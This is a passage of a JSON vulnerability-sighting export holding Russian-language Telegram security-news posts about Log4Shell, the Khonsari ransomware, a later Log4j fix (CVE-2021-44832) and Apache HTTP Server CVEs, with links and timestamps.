\u0441\u0432\u043e\u0435\u043c\u0443 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044e \u0432 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u0430\u0445. \u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0432\u043e\u0435 \u041f\u041e \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0440\u0435\u043a\u043b\u0438 \u0438\u043c\u0435\u043d\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430 \u0430\u043d\u0442\u0438\u043a\u0432\u0430\u0440\u043d\u043e\u0433\u043e \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0432 \u041b\u0443\u0438\u0437\u0438\u0430\u043d\u0435. \u041f\u043e\u0447\u0435\u043c\u0443 \u2013 \u043d\u0435 \u044f\u0441\u043d\u043e.\n \n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 Khonsari \u0441\u043a\u0430\u043d\u0438\u0442 \u0432\u0441\u0435 \u0434\u0438\u0441\u043a\u0438 \u0438 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043f\u0430\u043f\u043a\u0438 \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u0432\u0438\u0434\u0435\u043e, \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f\u043c\u0438, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430\u043c\u0438 \u0438 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f\u043c\u0438 .ini \u0438 .lnk. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 AES 128 CBC \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 PaddingMode.Zeros \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 BitDefender \u0432 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f RAT Orcus.\n \n\u041d\u0435 \u043e\u0431\u043e\u0448\u043b\u043e\u0441\u044c \u0438 \u0431\u0435\u0437 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0438 \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0445 \u0410\u0420\u0422, \u0441\u043b\u0435\u0434\u044b \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u044b\u044f\u0432\u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u044b \u0438\u0437 Mandiant. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u0445\u0430\u043e\u0441\u0430, \u0410\u0420\u0422 \u0437\u0430\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u043d\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0443, \u043d\u043e \u043f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0432\u044b\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u0434 \u0431\u043e\u043b\u0435\u0435 \u0430\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u043f\u0440\u0435\u0441\u043b\u0435\u0434\u0443\u044f \u043f\u043e\u0434\u0440\u044b\u0432\u043d\u044b\u0435 \u0446\u0435\u043b\u0438. \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Mandiant \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0441\u043e\u043e\u0431\u0449\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0442\u043e\u043c, \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0410\u0420\u0422 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n \n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 Check Point \u0441 44% \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 1,3 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u044b \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438. \u0412\u0441\u0435\u043e\u0431\u0449\u0438\u0439 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0430\u0436\u0438\u043e\u0442\u0430\u0436 \u0438 \u0445\u0430\u043e\u0441 \u0432\u043e \u0432\u0441\u0435\u043c \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043c\u0438\u0440\u0435 \u043d\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0442 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Wiz \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 89% \u0432\u0441\u0435\u0445 \u0441\u0440\u0435\u0434 \u0438\u043c\u0435\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0434\u0430\u0436\u0435 \u043d\u0435 \u0434\u043e\u0433\u0430\u0434\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u0431 \u044d\u0442\u043e\u043c. \u041d\u0430\u0441\u0442\u043e\u044f\u0449\u0430\u044f \u0447\u0435\u0440\u043d\u0430\u044f \u043f\u044f\u0442\u043d\u0438\u0446\u0430 \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439.\n \n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e Microsoft \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u044b Cobalt Strike, \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 Log4j, \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0449\u0435\u0433\u043e ransomware, \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0431\u043e\u043b\u0435\u0435 \u0443\u0432\u0435\u0441\u0438\u0441\u0442\u044b\u0435 \u0430\u043a\u0442\u043e\u0440\u044b \u0443\u0436\u0435 \u0432\u043e\u0432\u0441\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Log4 Jam, \u043d\u043e \u043f\u043e\u043a\u0430 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u0431\u043e\u043b\u0435\u0435 \u043d\u0430 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0448\u0438\u0440\u043e\u043a\u043e\u043c \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0435. \u0410 \u043f\u043e \u0438\u0441\u0442\u0435\u0447\u0435\u043d\u0438\u0438 \u043f\u0430\u0440\u044b \u0442\u0440\u043e\u0439\u043a\u0438 \u043d\u0435\u0434\u0435\u043b\u044c \u043c\u0435\u0441\u0442 \u043d\u0430 DLS, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0445\u0432\u0430\u0442\u0430\u0442\u044c, \u0447\u0442\u043e\u0431 \u0443\u043f\u043e\u0440\u044f\u0434\u043e\u0447\u0438\u0442\u044c \u0432\u0441\u0435\u0445 \u043d\u043e\u0432\u044b\u0445 \u0436\u0435\u0440\u0442\u0432 ransomware.\n \n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u043c\u043e\u043c\u0435\u043d\u0442\u0443 \u043f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u0435\u0440\u0435\u0434 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438 \u043f\u043e \u0418\u0411 \u0441\u0442\u043e\u0438\u0442 \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430: \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0432 \u0441\u0435\u0442\u0438.", "creation_timestamp": "2021-12-15T15:20:00.000000Z"}, {"uuid": "f27abb73-5c36-466e-a125-5c6f395c66b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/true_secator/2491", "content": "Apache \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0432 \u0443\u0441\u043a\u043e\u0440\u0435\u043d\u043d\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432\u043e-\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043b\u0435\u043f\u0438\u0442\u044c \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0438 \u043d\u0430 Log4j, \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e 2.17.1, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 (\u0443\u0436\u0435 \u0437\u0430\u043f\u0443\u0442\u0430\u043b\u0438\u0441\u044c \u043f\u043e \u0441\u0447\u0435\u0442\u0443) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (RCE) - CVE-2021-44832.\n \n\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u043e \u0443\u0436\u0435 \u043f\u044f\u0442\u0430\u044f \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0430\u044f \u0437\u0430 \u043c\u0435\u0441\u044f\u0446 CVE, \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u043f\u043e\u043b\u043e\u0436\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0447\u0430\u043b\u043e Log4Shell - CVE-2021-44228 \u043d\u0430\u0447\u0430\u043b\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438.\n \n\u041f\u044f\u0442\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 2.17.0 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 6,6 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u043e\u0432 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c JDNI \u0432 log4j.\n \nJDBC Appender \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 JndiManager \u043f\u0440\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u043a JNDI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u043e. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f JDBC Appender \u0441 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0441\u0441\u044b\u043b\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043d\u0430 JNDI URI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434.\n \n\u041d\u043e\u0432\u0443\u044e \u043b\u0430\u0433\u0443 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u042f\u043d\u0438\u0432 \u041d\u0438\u0437\u0440\u0438\u0439 \u0438\u0437 Checkmarx, \u0432\u044b\u0437\u0432\u0430\u0432 \u0431\u0443\u0440\u044e \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u0439 \u0432 Twitter. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e CVE \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u043e\u0437\u0436\u0435 \u041c\u0430\u0440\u043a\u043e\u043c \u0420\u043e\u0434\u0436\u0435\u0440\u0441\u043e\u043c, \u0432\u0438\u0446\u0435-\u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u043e\u043c \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Okta, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u043f\u043e\u044f\u0441\u043d\u0438\u043b, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u0442 \u043e\u0442 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 log4j, \u043a\u043e\u0433\u0434\u0430 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u0412 \u0446\u0435\u043b\u043e\u043c, \u044d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043f\u0440\u0435\u0436\u0434\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u0430\u043a \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0432 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u0441 Log4Shell.\n \n\u0412 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044e\u044e \u0432\u0435\u0440\u0441\u0438\u044e 2.17.1 (\u0434\u043b\u044f Java 8).\n \n\u041d\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0430\u0442\u0447\u0438 \u0443\u0436\u0435 \u043d\u0435 \u043e\u043a\u0430\u0436\u0443\u0442 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0441 Log4Shell, \u0436\u0435\u0440\u0442\u0432\u044b \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u043c\u043e\u0433\u0443\u0442 \u0434\u0430\u0436\u0435 \u0438 \u043d\u0435 \u0434\u043e\u0433\u0430\u0434\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u043e \u0441\u0432\u043e\u0435\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438: \u0434\u043e \u043f\u043e\u0440\u044b \u2013 \u0434\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438.", "creation_timestamp": "2021-12-29T16:00:23.000000Z"}, {"uuid": "eb83e7aa-54cc-4d27-abc2-11e568551749", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44224", "type": "seen", "source": "https://t.me/true_secator/2485", "content": "Apache Software Foundation \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0441\u0440\u043e\u0447\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0445 CVE-2021-44790 \u0438 CVE-2021-44224 \u0432\u043e \u0444\u043b\u0430\u0433\u043c\u0430\u043d\u0441\u043a\u043e\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 Apache HTTP Server, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c\u00a0 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 CVE-2021-44790 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043c\u043d\u043e\u0433\u043e\u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043d\u043e\u043c \u043f\u0430\u0440\u0441\u0435\u0440\u0435 mod_lua \u0432 Apache HTTP Server 2.4.51 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Apache Software Foundation \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e\u00a0 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0435\u0433\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f.\n\n\u0414\u0440\u0443\u0433\u0430\u044f CVE-2021-44224 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 \u043a\u043e\u043d\u0435\u0447\u043d\u0443\u044e \u0442\u043e\u0447\u043a\u0443 Unix Domain Socket, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u0443 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u041e\u0448\u0438\u0431\u043a\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435\u043c NULL \u0438\u043b\u0438 SSRF \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u043f\u0440\u044f\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u043a\u0441\u0438 \u0432 Apache HTTP Server 2.4.51 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 Apache \u0432 \u0441\u0435\u0442\u0438 \u0438 \u043d\u0430\u0447\u0430\u0432\u0448\u0443\u044e\u0441\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0434\u0440\u0443\u0433\u043e\u0439 CVE-2021-40438 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 SSRF \u0432 \u0434\u0438\u043a\u043e\u0439 